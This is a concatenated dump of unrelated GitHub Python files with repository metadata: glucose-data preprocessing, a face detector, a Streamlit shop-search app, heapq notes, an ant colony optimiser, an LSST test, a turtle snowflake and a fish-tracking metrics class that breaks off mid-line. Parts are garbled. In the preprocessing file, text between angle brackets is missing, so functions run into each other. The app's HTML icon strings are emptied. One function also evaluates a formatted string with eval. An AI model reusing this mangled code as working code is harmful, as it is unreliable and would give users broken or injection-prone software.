endregion\n","repo_name":"TzviCohen/Flight-Delay-Detector","sub_path":"task1/src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11532402103","text":"import pandas as pd\nimport datetime\nimport numpy as np\nimport warnings\nimport copy\n\ndef check_df(df):\n \"\"\"\n Check if the given object is a valid DataFrame.\n \n Args:\n df (object): The object to be checked.\n\n Returns:\n bool: True if the object is a valid DataFrame, False otherwise.\n\n Note:\n - If the object is not a DataFrame, a warning will be issued.\n - If the DataFrame has null values in the 'time' or 'glc' columns, it will be considered invalid.\n - An empty DataFrame will also be considered invalid.\n \"\"\"\n if not isinstance(df, pd.DataFrame):\n # I want to return this info to user somehow??\n warnings.warn('Not a dataframe')\n return False\n else:\n # drop any null values in the glc column\n df = df.dropna(subset=['time', 'glc'])\n if df.empty:\n warnings.warn('Empty dataframe')\n return False\n else:\n return True\n \ndef replace_cutoffs(df, remove=False, cap=True, lo_cutoff=2.1, hi_cutoff=22.3):\n \"\"\"\n Replace values in the 'glc' column of the given DataFrame based on specified cutoffs.\n\n Args:\n df (pandas.DataFrame): The DataFrame in which values will be replaced.\n remove (bool, optional): Indicates whether to remove rows with non-numeric 'glc' values. Defaults to False.\n cap (bool, optional): Indicates whether to cap values above the high cutoff and below the low cutoff. Defaults to True.\n lo_cutoff (float, optional): The low cutoff value for replacing 'glc' values. Defaults to 2.1.\n hi_cutoff (float, optional): The high cutoff value for replacing 'glc' values. Defaults to 22.3.\n\n Returns:\n pandas.DataFrame: The modified DataFrame with replaced 'glc' values and optionally removed rows.\n\n Note:\n - If remove is True, the function replaces non-numeric values in the 'glc' column with the respective cutoff values.\n - If cap is True, the function caps values above hi_cutoff and below lo_cutoff with the respective cutoff values.\n - The function also converts the 'glc' column to numeric values and converts the 'time' column to datetime.\n \"\"\"\n df = copy.copy(df)\n if not remove:\n df['glc']= pd.to_numeric(df['glc'].replace({'High': hi_cutoff, 'Low': lo_cutoff, 'high': hi_cutoff, 'low': lo_cutoff, \n 'HI':hi_cutoff, 'LO':lo_cutoff, 'hi':hi_cutoff, 'lo':lo_cutoff}))\n\n if cap:\n df.loc[df['glc']>hi_cutoff, 'glc'] = hi_cutoff\n df.loc[df['glc']limit)\n # Else no order is needed\n else:\n df_interp = df_resampled.interpolate(method=method,\n limit_area='inside',\n limit_direction='forward',\n limit=limit).mask(m>limit)\n df_interp = df_interp.round(1).reset_index()\n return df_interp\n\n\ndef set_time_frame(df, window):\n \"\"\"\n Filter the given DataFrame based on the specified time period.\n\n Args:\n df (pandas.DataFrame): The DataFrame to be filtered.\n period (list or dict): The time period to filter the DataFrame. It can be specified as a list or a dictionary.\n\n - If period is a list, it should contain two elements representing the start and end times of the period.\n Only the rows with 'time' values greater than or equal to the start time and less than the end time will be returned.\n\n - If period is a dictionary, it should contain key-value pairs where the keys represent IDs and the values\n are two-element lists representing the start and end times for each ID. The function will return all rows\n where the 'ID' column matches the specified IDs and the 'time' values fall within the respective time windows.\n\n Returns:\n pandas.DataFrame: The filtered DataFrame containing only the rows that match the specified time period.\n \n Raises:\n ValueError: If the period argument is not of type list or dict.\n \"\"\"\n if isinstance(window, list):\n return df.loc[(df['time']>=window[0])&(df['time']='{1}')&(df['time']<='{2}'))\".format(ID, window[0], window[1]) for ID, window in window.items()])\n cut_df = df[eval(conditions)].reset_index(drop=True)\n return cut_df\n else:\n raise ValueError(\"Invalid type for the 'period' argument. Expected a list or a dictionary.\")\n \ndef detect_units(df):\n if df['glc'].min() > 35:\n return 'mg/dL'\n else:\n return 'mmol/L'\n \n\ndef change_units(df):\n \"\"\"\n Convert glucose units in the DataFrame to a different unit based on a condition.\n\n Args:\n df (pandas.DataFrame): The DataFrame containing a 'glc' column with glucose readings.\n\n Returns:\n pandas.DataFrame: The DataFrame with glucose units converted based on the condition.\n\n Note:\n - The function checks the minimum glucose value in the DataFrame.\n - If the minimum value is greater than 50, the glucose units are converted to a different unit by multiplying with 0.0557 and rounding to one decimal place.\n - If the minimum value is less than or equal to 50, the glucose units are converted by multiplying with 0.0557 and rounding to the nearest integer.\n \"\"\"\n df = copy.copy(df)\n if detect_units(df)=='mg/dL':\n # Convert glucose units by multiplying with 0.0557 and rounding to one decimal place\n df['glc'] = (df['glc'] * 0.0557).round(1)\n else:\n # Convert glucose units by multiplying with 0.0557 and rounding to the nearest integer\n df['glc'] = (df['glc'] / 0.0557).round(0).astype(int)\n\n return df\n\n\n\n \n","repo_name":"cafoala/diametrics","sub_path":"src/diametrics/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17764300828","text":"import numpy as np\r\nimport os\r\nimport cv2\r\n\r\nclass FaceDetector(object):\r\n def __init__(self, deploy_path, caffe_path):\r\n self.net = cv2.dnn.readNetFromCaffe(deploy_path, caffe_path)\r\n\r\n def __detect__(self, image):\r\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n (h, w) = image.shape[:2]\r\n blob = cv2.dnn.blobFromImage(cv2.resize(\r\n image, (300, 300)), 1.0, (300, 300), (104.0, 177.0, 123.0)\r\n )\r\n self.net.setInput(blob)\r\n detections = self.net.forward()\r\n faces_coord = []\r\n for i in range(0, detections.shape[2]):\r\n confidence = detections[0, 0, i, 2]\r\n if confidence > 0.99:\r\n faces_coord.append((detections[0, 0, i, 3:7] * np.array([w, h, w, h])).astype(\"int\"))\r\n faces_coord = np.array(faces_coord)\r\n return faces_coord\r\n\r\n def __cut_faces__(self, image):\r\n faces = []\r\n faces_coord = self.__detect__(image)\r\n for (startX, startY, endX, endY) in faces_coord:\r\n slicer = image[startY:endY, startX:endX]\r\n if (len(slicer)):\r\n faces.append(slicer)\r\n\r\n return faces\r\n\r\n def __resize__(self, images, size=(224, 224)):\r\n images_norm = []\r\n for image in images:\r\n if image.shape < size:\r\n image_norm = cv2.resize(image, size,\r\n interpolation=cv2.INTER_AREA)\r\n else:\r\n image_norm = cv2.resize(image, size,\r\n interpolation=cv2.INTER_CUBIC)\r\n images_norm.append(image_norm)\r\n\r\n return images_norm\r\n\r\n def normalize_faces(self, image):\r\n faces = self.__cut_faces__(image)\r\n faces = self.__resize__(faces, (150, 150))\r\n\r\n return faces","repo_name":"julardos/StudentsAttendance","sub_path":"normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35648370398","text":"import datetime\nimport os\nfrom enum import Enum\nfrom typing import Dict, List\n\nimport pandas as pd\nimport streamlit as st\nfrom google_map_analyzer import PlaceType, run_search_api\n\nst.set_page_config(layout=\"wide\")\n\n\n# --- 1日の検索回数制限\nDATA_FILE = \"button_data.txt\"\nSEARCH_LIMIT = 15\n\n\ndef read_data():\n if not os.path.exists(DATA_FILE):\n return 0, None\n\n with open(DATA_FILE, \"r\") as f:\n lines = f.readlines()\n count = int(lines[0].strip())\n last_date = datetime.datetime.strptime(lines[1].strip(), \"%Y-%m-%d\").date()\n return count, last_date\n\n\ndef write_data(count, date):\n with open(DATA_FILE, \"w\") as f:\n f.write(str(count) + \"\\n\")\n f.write(date.strftime(\"%Y-%m-%d\"))\n\n\ncount, last_date = read_data()\ntoday = datetime.date.today()\n\nif last_date is None or last_date != today:\n count = 0\n# ---\n\n\nlink_css = \"\"\"\n \n\"\"\"\nst.write(link_css, unsafe_allow_html=True)\n\n\nst.title(\"SNS検索\")\n\nkeyword = st.text_input(\"キーワードを入力してください\", \"ラーメン\")\nlocation = st.text_input(\"場所を入力してください\", value=\"仙台駅\")\nradius = st.slider(\"検索半径を選択してください(m)\", min_value=1, max_value=10000, value=1000)\n\ntype_list = list(PlaceType)\ntype_list.append(\"指定なし\")\nshop_type = st.selectbox(\n \"タイプを選択してください\",\n type_list,\n index=type_list.index(\"指定なし\"),\n)\nsns_only = st.checkbox(\"SNSが存在する店舗のみ\")\n\n# Check if session state is already initialized\nif \"results\" not in st.session_state:\n st.session_state[\"results\"] = pd.DataFrame()\n\nsearch_col, download_col = st.columns([1, 1]) # set up the columns\n\n\nif (\n search_col.button(\"検索\", disabled=not (count < SEARCH_LIMIT))\n and count < SEARCH_LIMIT\n):\n results = run_search_api(keyword, location, radius, limit=5, _type=shop_type)\n results = [result for result in results if result[\"sns\"] or not sns_only]\n\n # Prepare results for DataFrame\n formatted_results = []\n for result in results:\n details = result[\"details\"][\"result\"]\n formatted_result = {\n \"name\": result[\"name\"],\n \"google_map_url\": result[\"google_map_url\"],\n \"phone\": details.get(\"formatted_phone_number\", \"\"),\n \"rating\": details.get(\"rating\", \"\"),\n \"website\": details.get(\"website\", \"\"),\n \"sns\": \"\\n\".join(result[\"sns\"]) if result[\"sns\"] else \"\",\n }\n formatted_results.append(formatted_result)\n\n # Update session state\n st.session_state[\"results\"] = pd.DataFrame(formatted_results)\n\n # 検索制限 +1\n count += 1\n write_data(count, today)\n\nif count >= SEARCH_LIMIT:\n st.warning(\"本日のボタンの押下回数の上限に達しました。\")\nelse:\n remaining = SEARCH_LIMIT - count\n st.info(f\"本日の残りの押下回数: {remaining} / {SEARCH_LIMIT}\")\n\n\n# Display results\nfor index, result in st.session_state[\"results\"].iterrows():\n st.subheader(result[\"name\"])\n col1, col2 = st.columns(2)\n with col1:\n st.write(f\"[Google Map]({result['google_map_url']})\")\n st.markdown(f\"**Phone**: {result['phone']}\")\n st.markdown(f\"**Rating**: {result['rating']}\")\n with col2:\n st.markdown(f\"**Website**: [{result['website']}]({result['website']})\")\n if result[\"sns\"] != \"\":\n icons = \"\"\n for sns in result[\"sns\"].split(\"\\n\"):\n if \"instagram.\" in sns:\n icons += (\n f' '\n )\n elif \"twitter.\" in sns:\n icons += (\n f' '\n )\n elif \"tiktok.\" in sns:\n icons += f' '\n elif \"facebook.\" in sns:\n icons += (\n f' '\n )\n elif \"line.\" in sns:\n icons += f' '\n st.markdown(icons, unsafe_allow_html=True)\n\ncsv = st.session_state[\"results\"].to_csv(index=False)\n\ndownload_col.download_button(\n label=\"結果をCSVに保存\",\n data=csv,\n file_name=\"shop_search_results.csv\",\n mime=\"text/csv\",\n)\n","repo_name":"TomoyaFujita2016/google-map-analyzer","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18704230028","text":"import heapq\n\n'''\n创建堆 2种方法\n- heappush one by one \n- heapify\n'''\n# 1\nnums = [2, 3, 5, 1, 54, 23, 132]\nheap = []\nfor num in nums:\n heapq.heappush(heap, num)\n# 获取最小值不弹出\nprint(heap[0])\n\n# 2\nnums = [2, 3, 5, 1, 54, 23, 132]\nheapq.heapify(nums) # nums 改变\n\n'''\nheappop\n'''\n# 获取最小值,弹出\nfor i in range(len(nums)):\n print(heapq.heappop(nums))\nprint(nums)\n\n'''\nmerge\n'''\nnums1 = [1, 2, 3, 4, 5] # 必须排好序\nnums2 = [3, 4, 5, 6, 7] # 必须排好序\n# 返回值的迭代器\nnums = heapq.merge(nums1, nums2)\nprint(list(nums))\n\n'''\nreplace\n'''\nnums = [2, 3, 5, 1, 54, 23, 132]\n# 删除最小元素 并 加入一个元素\nheapq.heapreplace(nums, 233)\nprint(nums)\n\n'''\nnlargest\nnsmallest\n'''\nnums = [2, 3, 5, 1, 54, 23, 132]\n# 最大/最小 得三个值\nprint(heapq.nlargest(3,nums))\nprint(heapq.nsmallest(3,nums))\n\n'''\npython中的堆排序模块heapq本身不支持自定义比较函数,\n(cmp_to_key 大法没有办法使用)\n可以通过重写对象的__lt__方法的方式来实现自定义比较函数。\n'''\n# if could write directly\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n def __lt__(self, other):\n return self.val < other.val\n\n# if cannot write directly\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\ndef __lt__(self, other):\n return self.val < other.val\nListNode.__lt__=__lt__\n","repo_name":"RoryDoctective/LeetCode","sub_path":"Python学习/heapq_learn.py","file_name":"heapq_learn.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36131085674","text":"from random import random\nfrom time import time\nfrom itertools import repeat\nfrom matplotlib import pyplot as plt\n\nfrom models.graph import Graph\nfrom models.ant import Ant\n\n\nclass ACO(object):\n \"\"\"This class holds all relevant infomation for objects required for running the ACO algorithm.\n\n ...\n\n Attributes\n ----------\n bins : Bin\n a bin object that holds items and a total weight.\n items : array(int)\n an array of integers representing the weights of items.\n ants : array(Ant)\n an array of Ant objects to be controlled during the algorithms run.\n best_ant : Ant\n an ant object - the best ant of the final generation of a algorithm run.\n graph : Graph\n a graph object to store the pheromone weights.\n num_paths : int\n the number of routes evaluated.\n limit : int\n the maximum number of evaluations allowed.\n verbose : boolean\n whether or not to print to the console when log() is called.\n ran : boolean\n has the ACO been run.\n runtime : float\n time duration of the last run.\n avg_fits : array(float)\n the timeseries of average fitnesses over each cycle.\n\n Methods\n -------\n summary()\n prints a summary of the last run if there is one.\n stats()\n returns the best fitness and time elapsed over last run if there is one.\n run()\n runs the ACO algorithm.\n explore()\n runs one cycle of route creation and evaporation.\n ant_run(ant)\n reset the ant and recreate its route.\n create_route(ant)\n create a route through the graph of pheromones.\n route_step(prev_bin, item)\n return a step from the current bin to the next bin position.\n route_fitness()\n calculate the fitness for the current bin configuration.\n set_champion()\n set the best ant for the current generation.\n empty_bins()\n reset all bins.\n log(message)\n prints to the console if verbose is true.\n graph_averages()\n create a graph using the data from avg_fits.\n \"\"\"\n\n def __init__(self, bins, items, population, evaporation_rate, limit=10000, verbose=False):\n \"\"\"Initialise the ACO object with the required parameters.\"\"\"\n self.bins = bins\n self.items = items\n\n self.ants = [Ant() for _ in range(population)]\n self.best_ant = None\n\n self.graph = Graph(len(bins), len(items), evaporation_rate)\n\n self.num_paths = 0\n self.limit = limit\n self.verbose = verbose\n\n self.ran = False\n self.runtime = 0\n\n self.avg_fits = []\n\n def summary(self):\n \"\"\"Print a summary of the last run if there is one.\"\"\"\n if hasattr(self, 'ran') and self.ran:\n print(\"Run was successful and took %d seconds.\" % int(self.runtime))\n print(\"--- Best fitness: %d\" % self.best_ant.fitness)\n print(\"--- Best bin config:\")\n for i, b in enumerate(self.best_ant.bins):\n print(\"%4d. %s\" % (i + 1, b))\n\n def stats(self):\n \"\"\"Return the best fitness achieved in the final generation and the time taken to run the ACO\"\"\"\n if hasattr(self, 'ran') and self.ran:\n return self.best_ant.fitness, self.runtime\n\n def run(self):\n \"\"\"Runs a full ACO run.\"\"\"\n self.log(\"--- Starting ACO Run ---\")\n self.ran = False\n self.best_fits = []\n self.avg_fits = []\n start_time = time()\n\n while self.num_paths < self.limit:\n self.explore()\n\n self.set_champion()\n\n self.ran = True\n self.runtime = time() - start_time\n\n def explore(self):\n \"\"\"Create a route for all ants and evaporate the graph.\"\"\"\n self.ants = [*map(self.ant_run, self.ants)]\n best = None\n for ant in self.ants:\n ant.lay_pheromones(self.graph)\n fitnesses = [ant.fitness for ant in self.ants]\n self.best_fits.append(min(fitnesses) / sum(self.items))\n self.avg_fits.append(sum(fitnesses) / len(fitnesses))\n self.graph.evaporate()\n\n def ant_run(self, ant):\n \"\"\"Reset the bins and create a route for the given ant.\"\"\"\n self.empty_bins()\n ant = self.create_route(ant)\n ant.bins = self.bins.copy()\n return ant\n\n def create_route(self, ant):\n \"\"\"Calculate a route through the pheromone graph.\"\"\"\n prev_bin = 0\n ant.route = []\n for item in enumerate(self.items):\n prev_bin, item = self.route_step(prev_bin, item)\n ant.route.append((prev_bin, item))\n\n ant.fitness = self.route_fitness()\n\n self.num_paths += 1\n\n return ant\n\n def route_step(self, prev_bin, item):\n \"\"\"Get the index of the next bin to place the item in.\"\"\"\n column = self.graph.graph[prev_bin][item[0]].tolist()\n total = sum(column)\n threshold = total * random()\n\n current = 0.0\n for index, weight in enumerate(column):\n if current + weight >= threshold:\n self.bins[index].add_item(item[1])\n return index, item[0]\n current += weight\n\n def route_fitness(self):\n \"\"\"Calculate the fitness of the current bin configuration.\"\"\"\n max_weight = self.bins[0].total_weight\n min_weight = self.bins[0].total_weight\n for b in self.bins:\n if b.total_weight > max_weight:\n max_weight = b.total_weight\n if b.total_weight < min_weight:\n min_weight = b.total_weight\n\n return max_weight - min_weight\n\n def set_champion(self):\n \"\"\"Allocate the best ant of the generation to the best_ant.\"\"\"\n for ant in self.ants:\n if self.best_ant and ant.fitness < self.best_ant.fitness:\n self.best_ant = ant.copy()\n elif not self.best_ant:\n self.best_ant = ant.copy()\n\n def empty_bins(self):\n \"\"\"Resets the bin configuration.\"\"\"\n [b.empty() for b in self.bins]\n\n def log(self, message):\n \"\"\"Prints a message to the console if verbose is true.\"\"\"\n if self.verbose:\n print(message)\n\n def graph_averages(self):\n \"\"\"Output a graph to the user based on the values in avg_fits\"\"\"\n plt.plot(self.avg_fits)\n plt.show()\n\n\nif __name__ == '__main__':\n from models.bins import generate_bins\n from models.items import generate_items\n\n bins = generate_bins(10)\n items = generate_items(quantity=200)\n population = 10\n evaporation_rate = 0.4\n\n trial = ACO(bins, items, population, evaporation_rate, verbose=True)\n trial.run()\n trial.graph_averages()\n","repo_name":"MitchSRobinson/AntColonyOptimisation","sub_path":"aco.py","file_name":"aco.py","file_ext":"py","file_size_in_byte":6678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"776735697","text":"import os\nimport unittest\n\nimport lsst.utils.tests\n\nfrom lsst.ci.hsc.gen3 import PSF_MODEL_ROBUSTNESS_FAILURE_DATA_IDS\nfrom lsst.daf.butler import Butler, DataCoordinate\nfrom lsst.utils import getPackageDir\n\n\nclass TestPsfModelTraceRadiusFails(lsst.utils.tests.TestCase):\n \"\"\"Test the deselection of detectors based on PSF model robustness check.\n \"\"\"\n def setUp(self):\n self.butler = Butler(os.path.join(getPackageDir(\"ci_hsc_gen3\"), \"DATA\"), writeable=False,\n collections=[\"HSC/calib/2013-06-17\", \"HSC/runs/ci_hsc\"])\n self.skymap = \"discrete/ci_hsc\"\n self.tract = 0\n self.patch = 69\n self.band = \"r\"\n self.coaddDataId = DataCoordinate.standardize(\n instrument=\"HSC\", skymap=self.skymap, tract=self.tract, patch=self.patch, band=self.band,\n universe=self.butler.dimensions,\n )\n\n def tearDown(self):\n del self.butler\n del self.skymap\n del self.tract\n del self.patch\n del self.band\n del self.coaddDataId\n\n def testFailedPsfTraceRadiusDeltaNotInCoadd(self):\n \"\"\"Check that the detectors failing the maxPsfTraceRadiusDelta\n criterion are not included in the coadd.\n \"\"\"\n coadd = self.butler.get(\"deepCoadd_calexp\", self.coaddDataId)\n inputCcds = coadd.getInfo().getCoaddInputs().ccds\n for failedDataId in PSF_MODEL_ROBUSTNESS_FAILURE_DATA_IDS:\n visit = failedDataId[\"visit\"]\n detector = failedDataId[\"detector\"]\n failedMask = (inputCcds[\"visit\"] == visit) & (inputCcds[\"ccd\"] == detector)\n self.assertTrue(sum(failedMask) == 0)\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n pass\n\n\nif __name__ == \"__main__\":\n lsst.utils.tests.init()\n unittest.main()\n","repo_name":"lsst/ci_hsc_gen3","sub_path":"tests/test_psfModelTraceFail.py","file_name":"test_psfModelTraceFail.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8737540456","text":"from turtle import forward, left, right, speed, exitonclick, setpos, penup, pendown\n\nspeed(0)\npenup()\nsetpos(-200, 200)\npendown()\n\ndef vlocka(a, u):\n if (u == 0):\n forward(a)\n return\n vlocka(a/3, u-1)\n left(60)\n vlocka(a/3, u-1)\n right(120)\n vlocka(a/3, u-1)\n left(60)\n vlocka(a/3, u-1)\n\n#vlocka(120,3)\n\nfor _ in range(3):\n vlocka(500,4)\n right(120)\n\nexitonclick()\n","repo_name":"krskovape/programovani","sub_path":"cv_10/kochova_vločka.py","file_name":"kochova_vločka.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4096852150","text":"import os\r\nimport re\r\nimport argparse\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nclass BackFiller:\r\n def __init__(self, approach_radius, frame_rate, result_folder, dims_x, ratio_pixmm,\r\n frame_file=None, window_size=10):\r\n self.size_ratio = ratio_pixmm * (480 / dims_x)\r\n\r\n self.approach_radius = approach_radius\r\n self.frame_rate = frame_rate\r\n self.window_size = window_size\r\n\r\n self.frame_file = frame_file\r\n if self.frame_file is not None:\r\n self.frame_snips = {}\r\n self._parse_frames(self.frame_file)\r\n\r\n self.sum_file = pd.DataFrame(\r\n columns=[\r\n \"Subject\",\r\n \"Duration in radius - left-facing\",\r\n \"Duration in radius - right-facing\",\r\n \"Duration outside radius - left-facing\",\r\n \"Duration outside radius - right-facing\",\r\n \"Left approaches\",\r\n \"Right approaches\",\r\n ]\r\n )\r\n\r\n @staticmethod\r\n def _comp_helper(vals, targ):\r\n for v in vals:\r\n if v != targ:\r\n return False\r\n return True\r\n\r\n def _parse_frames(self, source):\r\n with open(source, \"r\") as f:\r\n\r\n for idx, line in enumerate(f):\r\n\r\n # row specifying video name\r\n if idx % 3 == 0:\r\n vname = line.strip()\r\n self.frame_snips[vname] = {\"l_fish\": None, \"r_fish\": None}\r\n\r\n # row specifying left fish frames\r\n elif (idx - 1) % 3 == 0:\r\n delin = line.split(\" \")\r\n self.frame_snips[vname][\"l_fish\"] = [\r\n int(delin[0]), int(delin[1])]\r\n\r\n elif (idx - 2) % 3 == 0:\r\n delin = line.split(\" \")\r\n self.frame_snips[vname][\"r_fish\"] = [\r\n int(delin[0]), int(delin[1])]\r\n\r\n def _get_distance(self, x1, y1, x2, y2):\r\n return np.sqrt(np.square(x1 - x2) + np.square(y1 - y2)) / self.size_ratio\r\n\r\n def _is_left_facing(self, row, side_prefix):\r\n\r\n # which side of fish faces rod\r\n left_d = self._get_distance(\r\n row[f\"{side_prefix}head_l\"][0],\r\n row[f\"{side_prefix}head_l\"][1],\r\n row[f\"{side_prefix}rod\"][0],\r\n row[f\"{side_prefix}rod\"][1],\r\n )\r\n\r\n right_d = self._get_distance(\r\n row[f\"{side_prefix}head_r\"][0],\r\n row[f\"{side_prefix}head_r\"][1],\r\n row[f\"{side_prefix}rod\"][0],\r\n row[f\"{side_prefix}rod\"][1],\r\n )\r\n\r\n if left_d < right_d:\r\n return 1\r\n\r\n return 0\r\n\r\n def _is_in_radius(self, row, side_prefix):\r\n\r\n # which side of fish (if any) crosses approach-radius\r\n left_d = self._get_distance(\r\n row[f\"{side_prefix}head_l\"][0],\r\n row[f\"{side_prefix}head_l\"][1],\r\n row[f\"{side_prefix}rod\"][0],\r\n row[f\"{side_prefix}rod\"][1],\r\n )\r\n\r\n right_d = self._get_distance(\r\n row[f\"{side_prefix}head_r\"][0],\r\n row[f\"{side_prefix}head_r\"][1],\r\n row[f\"{side_prefix}rod\"][0],\r\n row[f\"{side_prefix}rod\"][1],\r\n )\r\n\r\n if left_d < self.approach_radius or right_d < self.approach_radius:\r\n return 1\r\n\r\n return 0\r\n\r\n def _get_metrics(self, filled_df, save_dir):\r\n\r\n out_df = pd.DataFrame(\r\n columns=[\r\n \"frame_idx\",\r\n \"l_in_radius\",\r\n \"l_left_approaches\",\r\n \"l_right_approaches\",\r\n \"l_in_time\",\r\n \"l_out_time\",\r\n \"l_in_left_time\",\r\n \"l_in_right_time\",\r\n \"l_out_left_time\",\r\n \"l_out_right_time\",\r\n \"l_left_head\",\r\n \"l_right_head\",\r\n \"l_center_head\",\r\n \"l_rod\",\r\n \"l_coords_filled\",\r\n \"r_in_radius\",\r\n \"r_left_approaches\",\r\n \"r_right_approaches\",\r\n \"r_in_time\",\r\n \"r_out_time\",\r\n \"r_in_left_time\",\r\n \"r_in_right_time\",\r\n \"r_out_left_time\",\r\n \"r_out_right_time\",\r\n \"r_left_head\",\r\n \"r_right_head\",\r\n \"r_center_head\",\r\n \"r_rod\",\r\n \"r_coords_filled\",\r\n ]\r\n )\r\n\r\n left_in_radius = False\r\n\r\n left_fish = {\r\n \"in_time\": 0,\r\n \"out_time\": 0,\r\n \"in_facing_left\": 0,\r\n \"in_facing_right\": 0,\r\n \"out_facing_left\": 0,\r\n \"out_facing_right\": 0,\r\n \"left_approach\": 0,\r\n \"right_approach\": 0,\r\n \"distance\": 0,\r\n }\r\n\r\n right_in_radius = False\r\n\r\n right_fish = {\r\n \"in_time\": 0,\r\n \"out_time\": 0,\r\n \"in_facing_left\": 0,\r\n \"in_facing_right\": 0,\r\n \"out_facing_left\": 0,\r\n \"out_facing_right\": 0,\r\n \"left_approach\": 0,\r\n \"right_approach\": 0,\r\n \"distance\": 0,\r\n }\r\n\r\n l_approach_duration = 0\r\n l_side_buffer = None\r\n r_approach_duration = 0\r\n r_side_buffer = None\r\n left_cols = [col for col in filled_df.columns if col.startswith(\"l\")]\r\n right_cols = [col for col in filled_df.columns if col.startswith(\"r\")]\r\n vid_key = save_dir.split(\"/\")[-2]\r\n\r\n if self.frame_file is not None:\r\n l_snip = self.frame_snips[vid_key][\"l_fish\"]\r\n l_idx_list = [i for i in range(l_snip[0], l_snip[1] + 1)]\r\n r_snip = self.frame_snips[vid_key][\"r_fish\"]\r\n r_idx_list = [i for i in range(r_snip[0], r_snip[1] + 1)]\r\n\r\n fill_row = [-1] * 9 + [[-1, -1]] * 4 + [-1]\r\n df_idx = -1\r\n\r\n for idx, frame in filled_df.iterrows():\r\n if self.frame_file is None or idx in l_idx_list + r_idx_list:\r\n df_idx += 1\r\n row = [idx]\r\n petri1 = frame.loc[left_cols]\r\n petri2 = frame[right_cols]\r\n\r\n # LEFT FISH\r\n # fish was in radius in previous frame\r\n if self.frame_file is None or idx in l_idx_list:\r\n if left_in_radius:\r\n if self._is_in_radius(petri1, \"l\") == 0:\r\n left_in_radius = False\r\n l_approach_duration = 0\r\n left_fish[\"out_time\"] += 1\r\n if self._is_left_facing(petri1, \"l\") == 1:\r\n left_fish[\"out_facing_left\"] += 1\r\n else:\r\n left_fish[\"out_facing_right\"] += 1\r\n\r\n else:\r\n left_fish[\"in_time\"] += 1\r\n l_approach_duration += 1\r\n\r\n if l_approach_duration == self.frame_rate // 2:\r\n if l_side_buffer == \"left\":\r\n left_fish[\"left_approach\"] += 1\r\n elif l_side_buffer == \"right\":\r\n left_fish[\"right_approach\"] += 1\r\n l_side_buffer = None\r\n\r\n if self._is_left_facing(petri1, \"l\") == 1:\r\n left_fish[\"in_facing_left\"] += 1\r\n else:\r\n left_fish[\"in_facing_right\"] += 1\r\n\r\n # fish wasn't in radius in previous frame\r\n else:\r\n if self._is_in_radius(petri1, \"l\") == 1:\r\n if self._is_left_facing(petri1, \"l\") == 1:\r\n l_side_buffer = \"left\"\r\n l_approach_duration += 1\r\n left_fish[\"in_time\"] += 1\r\n left_fish[\"in_facing_left\"] += 1\r\n left_in_radius = True\r\n\r\n else:\r\n l_side_buffer = \"right\"\r\n left_fish[\"in_time\"] += 1\r\n left_fish[\"in_facing_right\"] += 1\r\n left_in_radius = True\r\n\r\n else:\r\n left_fish[\"out_time\"] += 1\r\n l_approach_duration = 0\r\n if self._is_left_facing(petri1, \"l\") == 1:\r\n left_fish[\"out_facing_left\"] += 1\r\n else:\r\n left_fish[\"out_facing_right\"] += 1\r\n\r\n row.append(int(left_in_radius))\r\n row.append(left_fish[\"left_approach\"])\r\n row.append(left_fish[\"right_approach\"])\r\n row.append(\r\n round(left_fish[\"in_time\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"out_time\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"in_facing_left\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"in_facing_right\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"out_facing_left\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"out_facing_right\"] /\r\n self.frame_rate, 2)\r\n )\r\n row.append(petri1.loc[\"lhead_l\"]) # head l\r\n row.append(petri1.loc[\"lhead_r\"]) # head r\r\n row.append(petri1.loc[\"lhead_c\"]) # head c\r\n row.append(petri1.loc[\"lrod\"]) # rod\r\n row.append(petri1.loc[\"l_filled\"])\r\n\r\n else:\r\n row += fill_row\r\n\r\n # RIGHT FISH\r\n # fish was in radius in previous frame\r\n if self.frame_file is None or idx in r_idx_list:\r\n if right_in_radius:\r\n if self._is_in_radius(petri2, \"r\") == 0:\r\n right_in_radius = False\r\n r_approach_duration = 0\r\n right_fish[\"out_time\"] += 1\r\n\r\n if self._is_left_facing(petri2, \"r\") == 1:\r\n right_fish[\"out_facing_left\"] += 1\r\n else:\r\n right_fish[\"out_facing_right\"] += 1\r\n\r\n else:\r\n right_fish[\"in_time\"] += 1\r\n r_approach_duration += 1\r\n\r\n if r_approach_duration == self.frame_rate // 2:\r\n if r_side_buffer == \"left\":\r\n right_fish[\"left_approach\"] += 1\r\n elif r_side_buffer == \"right\":\r\n right_fish[\"right_approach\"] += 1\r\n r_side_buffer = None\r\n\r\n if self._is_left_facing(petri2, \"r\") == 1:\r\n right_fish[\"in_facing_left\"] += 1\r\n\r\n else:\r\n right_fish[\"in_facing_right\"] += 1\r\n if (\r\n self._comp_helper(petri2.rhead_l, -1)\r\n or 